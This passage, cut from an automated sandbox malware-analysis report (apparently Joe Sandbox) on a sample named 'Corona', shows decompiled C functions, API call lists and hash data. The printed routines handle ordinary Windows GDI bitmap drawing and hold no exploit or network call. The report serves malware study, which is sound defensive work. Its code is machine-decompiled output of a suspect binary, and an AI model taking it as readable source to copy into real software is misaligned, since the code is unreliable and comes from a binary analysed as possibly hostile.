                                  				_t107 = __eax;
                                  				_v8 = 0;
                                  				if(__eax == 0 || GetObjectA(__eax, 0x54,  &_v116) == 0) {
                                  					return _v8;
                                  				} else {
                                  					E0042037C(_t107);
                                  					_v12 = 0;
                                  					_v20 = 0;
                                  					_push(_t127);
                                  					_push(0x421083);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t130;
                                  					_push(0);
                                  					L0040638C();
                                  					_v12 = E0041D6C4(0);
                                  					_push(_v12);
                                  					L0040603C();
                                  					_v20 = E0041D6C4(_v12);
                                  					_push(0);
                                  					_push(1);
                                  					_push(1);
                                  					_push(_v108);
                                  					_t64 = _v112;
                                  					_push(_t64);
                                  					L00406024();
                                  					_v8 = _t64;
                                  					if(_v8 == 0) {
                                  						L17:
                                  						_t65 = 0;
                                  						_pop(_t116);
                                  						 *[fs:eax] = _t116;
                                  						_push(0x42108a);
                                  						if(_v20 != 0) {
                                  							_t65 = DeleteDC(_v20);
                                  						}
                                  						if(_v12 != 0) {
                                  							_t66 = _v12;
                                  							_push(_t66);
                                  							_push(0);
                                  							L004065C4();
                                  							return _t66;
                                  						}
                                  						return _t65;
                                  					} else {
                                  						_v32 = SelectObject(_v20, _v8);
                                  						if(__ecx != 0x1fffffff) {
                                  							_push(_v12);
                                  							L0040603C();
                                  							_v16 = E0041D6C4(_v12);
                                  							_push(_t127);
                                  							_push(0x42103b);
                                  							_push( *[fs:eax]);
                                  							 *[fs:eax] = _t130;
                                  							if(_v96 == 0) {
                                  								_v21 = 0;
                                  							} else {
                                  								_v21 = 1;
                                  								_v92 = 0;
                                  								_t107 = E004207C0(_t107, _t123, _t123, 0,  &_v116);
                                  							}
                                  							_v28 = SelectObject(_v16, _t107);
                                  							if(_t123 != 0) {
                                  								_push(0);
                                  								_push(_t123);
                                  								_push(_v16);
                                  								L0040619C();
                                  								_push(_v16);
                                  								L0040616C();
                                  								_push(0);
                                  								_push(_t123);
                                  								_push(_v20);
                                  								L0040619C();
                                  								_push(_v20);
                                  								L0040616C();
                                  							}
                                  							_t77 = SetBkColor(_v16, _t120);
                                  							_push(0xcc0020);
                                  							_push(0);
                                  							_push(0);
                                  							_push(_v16);
                                  							_push(_v108);
                                  							_push(_v112);
                                  							_push(0);
                                  							_push(0);
                                  							_push(_v20);
                                  							L00406014();
                                  							SetBkColor(_v16, _t77);
                                  							if(_v28 != 0) {
                                  								SelectObject(_v16, _v28);
                                  							}
                                  							if(_v21 != 0) {
                                  								DeleteObject(_t107);
                                  							}
                                  							_pop(_t117);
                                  							 *[fs:eax] = _t117;
                                  							_push(0x421042);
                                  							return DeleteDC(_v16);
                                  						} else {
                                  							PatBlt(_v20, 0, 0, _v112, _v108, 0x42);
                                  							if(_v32 != 0) {
                                  								SelectObject(_v20, _v32);
                                  							}
                                  							goto L17;
                                  						}
                                  					}
                                  				}
                                  			}

                                  APIs
                                  • GetObjectA.GDI32(?,00000054,?), ref: 00420EAB
                                  • 72E7AC50.USER32(00000000,00000000,00421083,?,?,00000054,?), ref: 00420ED9
                                  • 72E7A590.GDI32(?,00000000,00000000,00421083,?,?,00000054,?), ref: 00420EEA
                                  • 72E7A410.GDI32(?,?,00000001,00000001,00000000,?,00000000,00000000,00421083,?,?,00000054,?), ref: 00420F05
                                  • SelectObject.GDI32(?,00000000), ref: 00420F1F
                                  • PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 00420F41
                                  • 72E7A590.GDI32(?,?,00000000,?,?,00000001,00000001,00000000,?,00000000,00000000,00421083,?,?,00000054,?), ref: 00420F4F
                                  • SelectObject.GDI32(?), ref: 00420F97
                                  • 72E7B410.GDI32(?,?,00000000,?,?,00000000,0042103B,?,?,?,00000000,?,?,00000001,00000001,00000000), ref: 00420FAA
                                  • 72E7B150.GDI32(?,?,?,00000000,?,?,00000000,0042103B,?,?,?,00000000,?,?,00000001,00000001), ref: 00420FB3
                                  • 72E7B410.GDI32(?,?,00000000,?,?,?,00000000,?,?,00000000,0042103B,?,?,?,00000000,?), ref: 00420FBF
                                  • 72E7B150.GDI32(?,?,?,00000000,?,?,?,00000000,?,?,00000000,0042103B,?,?,?,00000000), ref: 00420FC8
                                  • SetBkColor.GDI32(?), ref: 00420FD2
                                  • 72E897E0.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020,?,?,?,?,00000000,0042103B), ref: 00420FF6
                                  • SetBkColor.GDI32(?,00000000), ref: 00421000
                                  • SelectObject.GDI32(?,00000000), ref: 00421013
                                  • DeleteObject.GDI32 ref: 0042101F
                                  • DeleteDC.GDI32(?), ref: 00421035
                                  • SelectObject.GDI32(?,00000000), ref: 00421050
                                  • DeleteDC.GDI32(00000000), ref: 0042106C
                                  • 72E7B380.USER32(00000000,00000000,0042108A,00000001,00000000,?,00000000,00000000,00421083,?,?,00000054,?), ref: 0042107D
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Object$Select$Delete$A590B150B410Color$A410B380E897
                                  • String ID:
                                  • API String ID: 4241548881-0
                                  • Opcode ID: 7e8de31d918b1b9a66cbf19770f8cfe7b2eeed5520028ff9359bb14997dfe728
                                  • Instruction ID: 1d157faa3061cef535302c33e3afb78cf33dd2e637aae01a1b54a8e383789e66
                                  • Opcode Fuzzy Hash: 7e8de31d918b1b9a66cbf19770f8cfe7b2eeed5520028ff9359bb14997dfe728
                                  • Instruction Fuzzy Hash: A4515F71F40254AFDB10DBE9DC45FAFB7FCAB08304F51446AB605EB292C6799940CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 65%
                                  			E00421BA4(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr* __edx, void* __edi, void* __esi, char* _a4) {
                                  				intOrPtr _v8;
                                  				intOrPtr* _v12;
                                  				void* _v16;
                                  				struct HDC__* _v20;
                                  				char _v24;
                                  				intOrPtr* _v28;
                                  				intOrPtr _v32;
                                  				intOrPtr _v36;
                                  				signed int _v37;
                                  				intOrPtr _v44;
                                  				void* _v48;
                                  				struct HDC__* _v52;
                                  				intOrPtr _v56;
                                  				intOrPtr* _v60;
                                  				intOrPtr* _v64;
                                  				short _v66;
                                  				short _v68;
                                  				signed short _v70;
                                  				signed short _v72;
                                  				void* _v76;
                                  				intOrPtr _v172;
                                  				char _v174;
                                  				intOrPtr _t150;
                                  				signed int _t160;
                                  				intOrPtr _t163;
                                  				void* _t166;
                                  				void* _t174;
                                  				void* _t183;
                                  				signed int _t188;
                                  				intOrPtr _t189;
                                  				struct HDC__* _t190;
                                  				struct HDC__* _t204;
                                  				signed int _t208;
                                  				signed short _t214;
                                  				intOrPtr _t241;
                                  				intOrPtr* _t245;
                                  				intOrPtr _t251;
                                  				intOrPtr _t289;
                                  				intOrPtr _t290;
                                  				intOrPtr _t295;
                                  				signed int _t297;
                                  				signed int _t317;
                                  				void* _t319;
                                  				void* _t320;
                                  				signed int _t321;
                                  				void* _t322;
                                  				void* _t323;
                                  				void* _t324;
                                  				intOrPtr _t325;
                                  
                                  				_t316 = __edi;
                                  				_t323 = _t324;
                                  				_t325 = _t324 + 0xffffff54;
                                  				_t319 = __ecx;
                                  				_v12 = __edx;
                                  				_v8 = __eax;
                                  				_v52 = 0;
                                  				_v44 = 0;
                                  				_v60 = 0;
                                  				 *((intOrPtr*)( *_v12 + 0xc))(__edi, __esi, __ebx, _t322);
                                  				_v37 = _v36 == 0xc;
                                  				if(_v37 != 0) {
                                  					_v36 = 0x28;
                                  				}
                                  				_v28 = E004026BC(_v36 + 0x40c);
                                  				_v64 = _v28;
                                  				_push(_t323);
                                  				_push(0x4220c1);
                                  				_push( *[fs:edx]);
                                  				 *[fs:edx] = _t325;
                                  				_push(_t323);
                                  				_push(0x422094);
                                  				_push( *[fs:edx]);
                                  				 *[fs:edx] = _t325;
                                  				if(_v37 == 0) {
                                  					 *((intOrPtr*)( *_v12 + 0xc))();
                                  					_t320 = _t319 - _v36;
                                  					_t150 =  *((intOrPtr*)(_v64 + 0x10));
                                  					if(_t150 != 3 && _t150 != 0) {
                                  						_v60 = E004030CC(1);
                                  						if(_a4 == 0) {
                                  							E00402B18( &_v174, 0xe);
                                  							_v174 = 0x4d42;
                                  							_v172 = _v36 + _t320;
                                  							_a4 =  &_v174;
                                  						}
                                  						 *((intOrPtr*)( *_v60 + 0x10))();
                                  						 *((intOrPtr*)( *_v60 + 0x10))();
                                  						 *((intOrPtr*)( *_v60 + 0x10))();
                                  						E004155D4(_v60,  *_v60, _v12, _t316, _t320, _t320, 0);
                                  						 *((intOrPtr*)( *_v60 + 0x14))();
                                  						_v12 = _v60;
                                  					}
                                  				} else {
                                  					 *((intOrPtr*)( *_v12 + 0xc))();
                                  					_t251 = _v64;
                                  					E00402B18(_t251, 0x28);
                                  					_t241 = _t251;
                                  					 *(_t241 + 4) = _v72 & 0x0000ffff;
                                  					 *(_t241 + 8) = _v70 & 0x0000ffff;
                                  					 *((short*)(_t241 + 0xc)) = _v68;
                                  					 *((short*)(_t241 + 0xe)) = _v66;
                                  					_t320 = _t319 - 0xc;
                                  				}
                                  				_t245 = _v64;
                                  				 *_t245 = _v36;
                                  				_v32 = _v28 + _v36;
                                  				if( *((short*)(_t245 + 0xc)) != 1) {
                                  					E0041D5A4();
                                  				}
                                  				if(_v36 == 0x28) {
                                  					_t214 =  *(_t245 + 0xe);
                                  					if(_t214 == 0x10 || _t214 == 0x20) {
                                  						if( *((intOrPtr*)(_t245 + 0x10)) == 3) {
                                  							E00415564(_v12, 0xc, _v32);
                                  							_v32 = _v32 + 0xc;
                                  							_t320 = _t320 - 0xc;
                                  						}
                                  					}
                                  				}
                                  				if( *(_t245 + 0x20) == 0) {
                                  					 *(_t245 + 0x20) = E0041D834( *(_t245 + 0xe));
                                  				}
                                  				_t317 = _v37 & 0x000000ff;
                                  				_t257 =  *(_t245 + 0x20) * 0;
                                  				E00415564(_v12,  *(_t245 + 0x20) * 0, _v32);
                                  				_t321 = _t320 -  *(_t245 + 0x20) * 0;
                                  				if( *(_t245 + 0x14) == 0) {
                                  					_t297 =  *(_t245 + 0xe) & 0x0000ffff;
                                  					_t208 = E0041D854( *((intOrPtr*)(_t245 + 4)), 0x20, _t297);
                                  					asm("cdq");
                                  					_t257 = _t208 * (( *(_t245 + 8) ^ _t297) - _t297);
                                  					 *(_t245 + 0x14) = _t208 * (( *(_t245 + 8) ^ _t297) - _t297);
                                  				}
                                  				_t160 =  *(_t245 + 0x14);
                                  				if(_t321 > _t160) {
                                  					_t321 = _t160;
                                  				}
                                  				if(_v37 != 0) {
                                  					_t160 = E0041DAFC(_v32);
                                  				}
                                  				_push(0);
                                  				L0040638C();
                                  				_v16 = E0041D6C4(_t160);
                                  				_push(_t323);
                                  				_push(0x42200f);
                                  				_push( *[fs:edx]);
                                  				 *[fs:edx] = _t325;
                                  				_t163 =  *((intOrPtr*)(_v64 + 0x10));
                                  				if(_t163 == 0 || _t163 == 3) {
                                  					if( *0x450444 == 0) {
                                  						_push(0);
                                  						_push(0);
                                  						_push( &_v24);
                                  						_push(0);
                                  						_push(_v28);
                                  						_t166 = _v16;
                                  						_push(_t166);
                                  						L00406044();
                                  						_v44 = _t166;
                                  						if(_v44 == 0 || _v24 == 0) {
                                  							if(GetLastError() != 0) {
                                  								E0040C5C8(_t245, _t257, _t317, _t321);
                                  							} else {
                                  								E0041D5A4();
                                  							}
                                  						}
                                  						_push(_t323);
                                  						_push( *[fs:eax]);
                                  						 *[fs:eax] = _t325;
                                  						E00415564(_v12, _t321, _v24);
                                  						_pop(_t289);
                                  						 *[fs:eax] = _t289;
                                  						_t290 = 0x421fde;
                                  						 *[fs:eax] = _t290;
                                  						_push(0x422016);
                                  						_t174 = _v16;
                                  						_push(_t174);
                                  						_push(0);
                                  						L004065C4();
                                  						return _t174;
                                  					} else {
                                  						goto L27;
                                  					}
                                  				} else {
                                  					L27:
                                  					_v20 = 0;
                                  					_v24 = E004026BC(_t321);
                                  					_push(_t323);
                                  					_push(0x421f77);
                                  					_push( *[fs:edx]);
                                  					 *[fs:edx] = _t325;
                                  					_t263 = _t321;
                                  					E00415564(_v12, _t321, _v24);
                                  					_push(_v16);
                                  					L0040603C();
                                  					_v20 = E0041D6C4(_v16);
                                  					_push(1);
                                  					_push(1);
                                  					_t183 = _v16;
                                  					_push(_t183);
                                  					L00406034();
                                  					_v48 = SelectObject(_v20, _t183);
                                  					_v56 = 0;
                                  					_t188 =  *(_v64 + 0x20);
                                  					if(_t188 > 0) {
                                  						_t263 = _t188;
                                  						_v52 = E0041DDB4(0, _t188);
                                  						_push(0);
                                  						_push(_v52);
                                  						_t204 = _v20;
                                  						_push(_t204);
                                  						L0040619C();
                                  						_v56 = _t204;
                                  						_push(_v20);
                                  						L0040616C();
                                  					}
                                  					_push(_t323);
                                  					_push(0x421f4b);
                                  					_push( *[fs:edx]);
                                  					 *[fs:edx] = _t325;
                                  					_push(0);
                                  					_t189 = _v28;
                                  					_push(_t189);
                                  					_push(_v24);
                                  					_push(4);
                                  					_push(_t189);
                                  					_t190 = _v20;
                                  					_push(_t190);
                                  					L0040604C();
                                  					_v44 = _t190;
                                  					if(_v44 == 0) {
                                  						if(GetLastError() != 0) {
                                  							E0040C5C8(_t245, _t263, _t317, _t321);
                                  						} else {
                                  							E0041D5A4();
                                  						}
                                  					}
                                  					_pop(_t295);
                                  					 *[fs:eax] = _t295;
                                  					_push(0x421f52);
                                  					if(_v56 != 0) {
                                  						_push(0xffffffff);
                                  						_push(_v56);
                                  						_push(_v20);
                                  						L0040619C();
                                  					}
                                  					return DeleteObject(SelectObject(_v20, _v48));
                                  				}
                                  			}


                                  APIs
                                  • 72E7AC50.USER32(00000000,?,00000000,004220C1,?,?), ref: 00421E0E
                                  • 72E7A590.GDI32(00000001,00000000,00421F77,?,00000000,0042200F,?,00000000,?,00000000,004220C1,?,?), ref: 00421E73
                                  • 72E7A520.GDI32(00000001,00000001,00000001,00000001,00000000,00421F77,?,00000000,0042200F,?,00000000,?,00000000,004220C1,?,?), ref: 00421E88
                                  • SelectObject.GDI32(?,00000000), ref: 00421E92
                                  • 72E7B410.GDI32(?,?,00000000,?,00000000,00000001,00000001,00000001,00000001,00000000,00421F77,?,00000000,0042200F,?,00000000), ref: 00421EC2
                                  • 72E7B150.GDI32(?,?,?,00000000,?,00000000,00000001,00000001,00000001,00000001,00000000,00421F77,?,00000000,0042200F), ref: 00421ECE
                                  • 72E7A7F0.GDI32(?,?,00000004,00000000,?,00000000,00000000,00421F4B,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 00421EF2
                                  • GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,00421F4B,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 00421F00
                                  • 72E7B410.GDI32(?,00000000,000000FF,00421F52,00000000,?,00000000,00000000,00421F4B,?,?,00000000,00000001,00000001,00000001,00000001), ref: 00421F32
                                  • SelectObject.GDI32(?,?), ref: 00421F3F
                                  • DeleteObject.GDI32(00000000), ref: 00421F45
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Object$B410Select$A520A590B150DeleteErrorLast
                                  • String ID: ($BM
                                  • API String ID: 3415089252-2980357723
                                  • Opcode ID: c1694a23d20e7c26f37fb0fe935c7ad1abeed6687539bcd0167cf8475e2bcb6d
                                  • Instruction ID: 6c276c34b4382dc2fc42aee856c54ea09dee44fbe49ed7c999c9d8d60e446c0b
                                  • Opcode Fuzzy Hash: c1694a23d20e7c26f37fb0fe935c7ad1abeed6687539bcd0167cf8475e2bcb6d
                                  • Instruction Fuzzy Hash: 61D16F74A002189FDF04DFA9D985BAEBBF5FF48304F51846AE914EB395D7389840CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 71%
                                  			E0042138C(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                  				intOrPtr _v8;
                                  				void* _v12;
                                  				char _v13;
                                  				struct tagPOINT _v21;
                                  				struct HDC__* _v28;
                                  				void* _v32;
                                  				intOrPtr _t78;
                                  				struct HDC__* _t80;
                                  				signed int _t82;
                                  				signed int _t83;
                                  				signed int _t84;
                                  				char _t85;
                                  				void* _t92;
                                  				struct HDC__* _t115;
                                  				void* _t136;
                                  				struct HDC__* _t160;
                                  				intOrPtr* _t164;
                                  				intOrPtr _t172;
                                  				intOrPtr _t176;
                                  				intOrPtr _t178;
                                  				intOrPtr _t180;
                                  				int* _t184;
                                  				intOrPtr _t186;
                                  				void* _t188;
                                  				void* _t189;
                                  				intOrPtr _t190;
                                  
                                  				_t165 = __ecx;
                                  				_t188 = _t189;
                                  				_t190 = _t189 + 0xffffffe4;
                                  				_t184 = __ecx;
                                  				_v8 = __edx;
                                  				_t164 = __eax;
                                  				_t186 =  *((intOrPtr*)(__eax + 0x28));
                                  				_t172 =  *0x4215d8; // 0xf
                                  				E0041D3A0(_v8, __ecx, _t172);
                                  				E0042191C(_t164);
                                  				_v12 = 0;
                                  				_v13 = 0;
                                  				_t78 =  *((intOrPtr*)(_t186 + 0x10));
                                  				if(_t78 != 0) {
                                  					_push(0xffffffff);
                                  					_push(_t78);
                                  					_t160 =  *(_v8 + 4);
                                  					_push(_t160);
                                  					L0040619C();
                                  					_v12 = _t160;
                                  					_push( *(_v8 + 4));
                                  					L0040616C();
                                  					_v13 = 1;
                                  				}
                                  				_push(0xc);
                                  				_t80 =  *(_v8 + 4);
                                  				_push(_t80);
                                  				L004060D4();
                                  				_push(_t80);
                                  				_push(0xe);
                                  				_t82 =  *(_v8 + 4);
                                  				L004060D4();
                                  				_t83 = _t82;
                                  				_t84 = _t83 * _t82;
                                  				if(_t84 > 8) {
                                  					L4:
                                  					_t85 = 0;
                                  				} else {
                                  					_t165 =  *(_t186 + 0x28) & 0x0000ffff;
                                  					if(_t84 < ( *(_t186 + 0x2a) & 0x0000ffff) * ( *(_t186 + 0x28) & 0x0000ffff)) {
                                  						_t85 = 1;
                                  					} else {
                                  						goto L4;
                                  					}
                                  				}
                                  				if(_t85 == 0) {
                                  					if(E00421718(_t164) == 0) {
                                  						SetStretchBltMode(E0041D2CC(_v8), 3);
                                  					}
                                  				} else {
                                  					GetBrushOrgEx( *(_v8 + 4),  &_v21);
                                  					SetStretchBltMode( *(_v8 + 4), 4);
                                  					SetBrushOrgEx( *(_v8 + 4), _v21, _v21.y,  &_v21);
                                  				}
                                  				_push(_t188);
                                  				_push(0x4215c8);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t190;
                                  				if( *((intOrPtr*)( *_t164 + 0x28))() != 0) {
                                  					E004218BC(_t164, _t165);
                                  				}
                                  				_t92 = E0042165C(_t164);
                                  				_t176 =  *0x4215d8; // 0xf
                                  				E0041D3A0(_t92, _t165, _t176);
                                  				if( *((intOrPtr*)( *_t164 + 0x28))() == 0) {
                                  					StretchBlt( *(_v8 + 4),  *_t184, _t184[1], _t184[2] -  *_t184, _t184[3] - _t184[1],  *(E0042165C(_t164) + 4), 0, 0,  *(_t186 + 0x1c),  *(_t186 + 0x20),  *(_v8 + 0x20));
                                  					_pop(_t178);
                                  					 *[fs:eax] = _t178;
                                  					_push(0x4215cf);
                                  					if(_v13 != 0) {
                                  						_push(0xffffffff);
                                  						_push(_v12);
                                  						_t115 =  *(_v8 + 4);
                                  						_push(_t115);
                                  						L0040619C();
                                  						return _t115;
                                  					}
                                  					return 0;
                                  				} else {
                                  					_v32 = 0;
                                  					_v28 = 0;
                                  					_push(_t188);
                                  					_push(0x42155d);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t190;
                                  					L0040603C();
                                  					_v28 = E0041D6C4(0);
                                  					_v32 = SelectObject(_v28,  *(_t186 + 0xc));
                                  					E0041D868( *(_v8 + 4), _t164, _t184[1],  *_t184, _t184, _t186, 0, 0, _v28,  *(_t186 + 0x20),  *(_t186 + 0x1c), 0, 0,  *(E0042165C(_t164) + 4), _t184[3] - _t184[1], _t184[2] -  *_t184);
                                  					_t136 = 0;
                                  					_t180 = 0;
                                  					 *[fs:eax] = _t180;
                                  					_push(0x4215a2);
                                  					if(_v32 != 0) {
                                  						_t136 = SelectObject(_v28, _v32);
                                  					}
                                  					if(_v28 != 0) {
                                  						return DeleteDC(_v28);
                                  					}
                                  					return _t136;
                                  				}
                                  			}

                                  APIs
                                    • Part of subcall function 0042191C: 72E7AC50.USER32(00000000,?,?,?,?,00420553,00000000,004205DF), ref: 00421972
                                    • Part of subcall function 0042191C: 72E7AD70.GDI32(00000000,0000000C,00000000,?,?,?,?,00420553,00000000,004205DF), ref: 00421987
                                    • Part of subcall function 0042191C: 72E7AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,00420553,00000000,004205DF), ref: 00421991
                                    • Part of subcall function 0042191C: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00420553,00000000,004205DF), ref: 004219B5
                                    • Part of subcall function 0042191C: 72E7B380.USER32(00000000,00000000,00000000,?,?,?,?,00420553,00000000,004205DF), ref: 004219C0
                                  • 72E7B410.GDI32(?,?,000000FF), ref: 004213CE
                                  • 72E7B150.GDI32(?,?,?,000000FF), ref: 004213DD
                                  • 72E7AD70.GDI32(?,0000000C), ref: 004213EF
                                  • 72E7AD70.GDI32(?,0000000E,00000000,?,0000000C), ref: 004213FE
                                  • GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 00421431
                                  • SetStretchBltMode.GDI32(?,00000004), ref: 0042143F
                                  • SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 00421457
                                  • SetStretchBltMode.GDI32(00000000,00000003), ref: 00421474
                                  • 72E7A590.GDI32(00000000,00000000,0042155D,?,?,0000000E,00000000,?,0000000C), ref: 004214D4
                                  • SelectObject.GDI32(?,?), ref: 004214E9
                                  • SelectObject.GDI32(?,00000000), ref: 00421548
                                  • DeleteDC.GDI32(00000000), ref: 00421557
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: BrushModeObjectSelectStretch$A590B150B380B410CreateDeleteHalftonePalette
                                  • String ID:
                                  • API String ID: 2051775979-0
                                  • Opcode ID: 5b73ba958e488c07fecdcfe3379814d92ef0b8981f44f62b6f307e6d4985e1a9
                                  • Instruction ID: f8d248818c06f3afc7ddb4ab2b5839b80df9585e6c3c76bc2cafb61184feeb3f
                                  • Opcode Fuzzy Hash: 5b73ba958e488c07fecdcfe3379814d92ef0b8981f44f62b6f307e6d4985e1a9
                                  • Instruction Fuzzy Hash: 67715DB5B00205AFDB10EFA9C985F5EB7F8AF08304F5145AAF509E7292C638ED40CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 51%
                                  			E0041D6D4(struct HDC__* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
                                  				void* _v8;
                                  				int _v12;
                                  				int _v16;
                                  				void* _v20;
                                  				int _v24;
                                  				struct HDC__* _v28;
                                  				struct HDC__* _v32;
                                  				int _v48;
                                  				int _v52;
                                  				void _v56;
                                  				int _t37;
                                  				void* _t41;
                                  				int _t43;
                                  				void* _t47;
                                  				void* _t72;
                                  				intOrPtr _t79;
                                  				intOrPtr _t80;
                                  				void* _t85;
                                  				void* _t87;
                                  				void* _t88;
                                  				intOrPtr _t89;
                                  
                                  				_t87 = _t88;
                                  				_t89 = _t88 + 0xffffffcc;
                                  				asm("movsd");
                                  				asm("movsd");
                                  				_t71 = __ecx;
                                  				_v8 = __eax;
                                  				_push(0);
                                  				L0040603C();
                                  				_v28 = __eax;
                                  				_push(0);
                                  				L0040603C();
                                  				_v32 = __eax;
                                  				_push(_t87);
                                  				_push(0x41d822);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t89;
                                  				_t37 = GetObjectA(_v8, 0x18,  &_v56);
                                  				if(__ecx == 0) {
                                  					_push(0);
                                  					L0040638C();
                                  					_v24 = _t37;
                                  					if(_v24 == 0) {
                                  						E0041D61C(__ecx);
                                  					}
                                  					_push(_t87);
                                  					_push(0x41d791);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t89;
                                  					_push(_v12);
                                  					_push(_v16);
                                  					_t41 = _v24;
                                  					_push(_t41);
                                  					L00406034();
                                  					_v20 = _t41;
                                  					if(_v20 == 0) {
                                  						E0041D61C(_t71);
                                  					}
                                  					_pop(_t79);
                                  					 *[fs:eax] = _t79;
                                  					_push(0x41d798);
                                  					_t43 = _v24;
                                  					_push(_t43);
                                  					_push(0);
                                  					L004065C4();
                                  					return _t43;
                                  				} else {
                                  					_push(0);
                                  					_push(1);
                                  					_push(1);
                                  					_push(_v12);
                                  					_t47 = _v16;
                                  					_push(_t47);
                                  					L00406024();
                                  					_v20 = _t47;
                                  					if(_v20 != 0) {
                                  						_t72 = SelectObject(_v28, _v8);
                                  						_t85 = SelectObject(_v32, _v20);
                                  						StretchBlt(_v32, 0, 0, _v16, _v12, _v28, 0, 0, _v52, _v48, 0xcc0020);
                                  						if(_t72 != 0) {
                                  							SelectObject(_v28, _t72);
                                  						}
                                  						if(_t85 != 0) {
                                  							SelectObject(_v32, _t85);
                                  						}
                                  					}
                                  					_pop(_t80);
                                  					 *[fs:eax] = _t80;
                                  					_push(E0041D829);
                                  					DeleteDC(_v28);
                                  					return DeleteDC(_v32);
                                  				}
                                  			}

                                  APIs
                                  • 72E7A590.GDI32(00000000), ref: 0041D6EB
                                  • 72E7A590.GDI32(00000000,00000000), ref: 0041D6F5
                                  • GetObjectA.GDI32(?,00000018,?), ref: 0041D715
                                  • 72E7A410.GDI32(?,?,00000001,00000001,00000000,00000000,0041D822,?,00000000,00000000), ref: 0041D72C
                                  • 72E7AC50.USER32(00000000,00000000,0041D822,?,00000000,00000000), ref: 0041D738
                                  • 72E7A520.GDI32(00000000,?,?,00000000,0041D791,?,00000000,00000000,0041D822,?,00000000,00000000), ref: 0041D765
                                  • 72E7B380.USER32(00000000,00000000,0041D798,00000000,0041D791,?,00000000,00000000,0041D822,?,00000000,00000000), ref: 0041D78B
                                  • SelectObject.GDI32(?,?), ref: 0041D7A6
                                  • SelectObject.GDI32(?,00000000), ref: 0041D7B5
                                  • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 0041D7E1
                                  • SelectObject.GDI32(?,00000000), ref: 0041D7EF
                                  • SelectObject.GDI32(?,00000000), ref: 0041D7FD
                                  • DeleteDC.GDI32(?), ref: 0041D813
                                  • DeleteDC.GDI32(?), ref: 0041D81C
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Object$Select$A590Delete$A410A520B380Stretch
                                  • String ID:
                                  • API String ID: 956127455-0
                                  • Opcode ID: 02ce32e2b0884cbdecf92cd8213ca8aa77c6a502b501b08218de68116e50bda9
                                  • Instruction ID: 68cc4fe12e448ed7e9ee0d1cae2db1c0752f9fb96219d103ce1fcdb821cdee86
                                  • Opcode Fuzzy Hash: 02ce32e2b0884cbdecf92cd8213ca8aa77c6a502b501b08218de68116e50bda9
                                  • Instruction Fuzzy Hash: BA410DB1E40209AFDB10EBE9CC42FAFB7FCEB08704F514426B615F7281D67959518B68
